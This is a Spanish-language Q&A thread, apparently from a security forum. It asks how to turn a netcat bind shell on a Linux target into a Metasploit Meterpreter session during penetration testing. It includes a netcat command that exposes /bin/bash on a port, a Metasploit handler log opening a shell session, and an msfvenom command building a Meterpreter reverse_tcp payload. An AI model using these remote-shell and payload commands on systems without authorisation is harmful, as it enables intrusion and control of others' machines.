Actualizar un shell de enlace ncat a meterpreter [cerrado]

1

Durante las pruebas de penetración, a menudo puedo abrir un Ncat Bind Shell en el sistema de la víctima (linux), que abre un puerto al que puedo conectarme:

nc -l -v -k -e /bin/bash -p 4444

Ahora quiero actualizar este shell ncat a una sesión de meterpreter. Encontré esta publicación en el foro de la comunidad rapid7 que aborda el problema:

enlace

La respuesta dada es la siguiente:

  

Netcat es un ejecutable completamente independiente que no se puede actualizar desde el marco a meterpreter. Puede agregar una cuenta de usuario a través de la línea de comandos, luego usar psexec para cargar y ejecutar el binario del medidor de contador.

Básicamente, metasploit siempre enviará primero un stager que luego descarga el binario completo de meterpreter, pero no puede interactuar directamente con el shell ncat. La publicación sugiere simplemente cargar el binario completo de meterpreter a través del shell ncat y luego ejecutarlo. Sin embargo, no pude encontrar un binario independiente dentro del marco.

PS: Aquí hay algunos resultados de depuración del marco metasploit al intentar actualizar el shell ncat:

msf > use multi/handler
msf exploit(handler) > set payload linux/x64/shell/bind_tcp 
payload => linux/x64/shell/bind_tcp
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set RHOST 192.168.0.101
RHOST => 192.168.0.3
msf exploit(handler) > run 

[*] Starting the payload handler...
[*] Started bind handler
[*] Sending stage (38 bytes) to 192.168.0.101
[*] Command shell session 1 opened (192.168.0.17:33097 -> 192.168.0.101:4444) at 2017-06-05 10:23:35 +0200

Background session 1? [y/N]  y

msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[-] Shells on the target platform, linux, cannot be upgraded to Meterpreter at this time.
    
pregunta B. Assadsolimani 05.06.2017 - 10:34
fuente

1 respuesta

1

Puedes generar tal exe con msfvenom.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=<your port> -f exe

Eso es todo.

    
respondido por el kaidentity 06.06.2017 - 13:04
fuente

Lea otras preguntas en las etiquetas